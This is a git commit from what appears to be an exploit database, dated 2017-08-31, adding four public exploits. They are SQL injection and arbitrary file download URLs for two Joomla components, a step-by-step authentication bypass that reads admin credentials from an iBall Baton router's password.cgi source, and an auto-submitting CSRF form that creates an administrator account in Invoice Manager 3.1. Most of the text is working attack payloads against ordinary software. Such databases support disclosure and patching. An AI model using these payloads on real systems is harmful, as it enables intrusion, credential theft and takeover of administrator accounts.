DB: 2017-08-31
4 new exploits Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection Joomla! Component Joomanager 2.0.0 - Arbitrary File Download iBall Baton 150M Wireless Router - Authentication Bypass Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
parent
13819fd065
commit
6b9cb90c81
5 changed files with 202 additions and 0 deletions
|
@ -38373,3 +38373,7 @@ id,file,description,date,author,platform,type,port
|
|||
42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
|
||||
42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
|
||||
42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0
|
||||
42589,platforms/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",php,webapps,0
|
||||
42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
|
||||
42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
|
||||
42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
26
platforms/php/webapps/42589.txt
Executable file
26
platforms/php/webapps/42589.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.08.2017
|
||||
# Vendor Homepage: http://joomplace.com/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/
|
||||
# Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe
|
||||
# Version: 3.7.4
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
25
platforms/php/webapps/42590.txt
Executable file
25
platforms/php/webapps/42590.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
|
||||
# Dork: N/A
|
||||
# Date: 30.08.2017
|
||||
# Vendor Homepage: http://www.joomanager.com/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/
|
||||
# Demo: http://www.joomanager.com/demo/realestate
|
||||
# Version: 2.0.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The security obligation allows an attacker to arbitrary download files..
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
74
platforms/php/webapps/42591.txt
Executable file
74
platforms/php/webapps/42591.txt
Executable file
|
@ -0,0 +1,74 @@
|
|||
Title:
|
||||
====
|
||||
iball Baton 150M Wireless router - Authentication Bypass
|
||||
|
||||
Credit:
|
||||
======
|
||||
Name: Indrajith.A.N
|
||||
Website: https://www.indrajithan.com
|
||||
|
||||
Date:
|
||||
====
|
||||
07-03-2017
|
||||
|
||||
Vendor:
|
||||
======
|
||||
iball Envisioning the tremendous potential for innovative products required
|
||||
by the ever evolving users in computing and digital world, iBall was
|
||||
launched in September 2001 and which is one of the leading networking
|
||||
company
|
||||
|
||||
Product:
|
||||
=======
|
||||
iball Baton 150M Wireless-N ADSI.2+ Router
|
||||
|
||||
Product link:
|
||||
http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
|
||||
|
||||
Abstract:
|
||||
=======
|
||||
iball Baton 150M Router's login page is insecurely developed that any
|
||||
attacker could bypass the admin's authentication just by tweaking the
|
||||
password.cgi file.
|
||||
|
||||
Affected Version:
|
||||
=============
|
||||
Firmware Version : 1.2.6 build 110401 Rel.47776n
|
||||
Hardware Version : iB-WRA150N v1 00000001
|
||||
|
||||
Exploitation-Technique:
|
||||
===================
|
||||
Remote
|
||||
|
||||
Severity Rating:
|
||||
===================
|
||||
9
|
||||
|
||||
Details:
|
||||
=======
|
||||
Any attacker can escalate his privilege to admin using this vulnerability.
|
||||
|
||||
Proof Of Concept:
|
||||
================
|
||||
1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,
|
||||
i.e 172.20.174.1
|
||||
|
||||
2) Now just append password.cgi to the URL i.e
|
||||
http://172.20.174.1/password.cgi
|
||||
|
||||
3) Right-click and View Source code which disclsus the username, password
|
||||
and user role of the admin in the comment section
|
||||
|
||||
4) Successfully logged in using the disclosed credentials.
|
||||
|
||||
Reference:
|
||||
=========
|
||||
Video POC :
|
||||
https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: March 5, 2017
|
||||
|
||||
-----
|
||||
Indrajith.A.N
|
73
platforms/php/webapps/42592.html
Executable file
73
platforms/php/webapps/42592.html
Executable file
|
@ -0,0 +1,73 @@
|
|||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
<!--
|
||||
# Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
|
||||
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
||||
# Dork: inurl:controller=pjAdmin
|
||||
# Date: 30.08.2017
|
||||
# Homepage: https://www.phpjabbers.com/invoice-manager/
|
||||
# Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
|
||||
# Version: 3.1
|
||||
# Category: Webapps /php
|
||||
# Tested on: mozila firefox
|
||||
#
|
||||
#
|
||||
-->
|
||||
|
||||
# ========================================================
|
||||
#
|
||||
#
|
||||
# Invoice Manager v3.1 Cross site request forgery (Add Admin)
|
||||
#
|
||||
# Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be
|
||||
# tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
|
||||
# Once exploited, the attacker can login as the admin using the email and the password in the below exploit.
|
||||
#
|
||||
#
|
||||
# ======================CSRF POC (Adding New user with Administrator Privileges)==================================
|
||||
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">
|
||||
|
||||
<input name="user_create" id="user_create" value="1" type="hidden">
|
||||
<input name="role_id" id="role_id" value="1" type="hidden" >
|
||||
<input name="email" id="email" value="AliBawazeEer@localhost.com" type="hidden">
|
||||
<input name="password" id="password" value="12341234" type="hidden">
|
||||
<input name="name" id="name" value="Ali BawazeEer" type="hidden">
|
||||
<input name="phone" id="phone" value="911911911" type="hidden">
|
||||
<input name="status" id="status" value="T" type="hidden">
|
||||
<script type="text/javascript">document.csrf_form.submit();</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
# =================================================EOF =======================================================
|
||||
#
|
||||
#
|
||||
# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
|
||||
# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
|
||||
#
|
||||
#
|
||||
# Remedy : developer should implement CSRF token for each request
|
||||
#
|
||||
#
|
||||
#
|
||||
# ========================================================
|
||||
# [+] Disclaimer
|
||||
#
|
||||
# Permission is hereby granted for the redistribution of this advisory,
|
||||
# provided that it is not altered except by reformatting it, and that due
|
||||
# credit is given. Permission is explicitly given for insertion in
|
||||
# vulnerability databases and similar, provided that due credit is given to
|
||||
# the author. The author is not responsible for any misuse of the information contained
|
||||
# herein and prohibits any malicious use of all security related information
|
||||
# or exploits by the author or elsewhere.
|
||||
#
|
||||
#
|
||||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
|
||||
|
||||
|
||||
|
Loading…
Add table
Reference in a new issue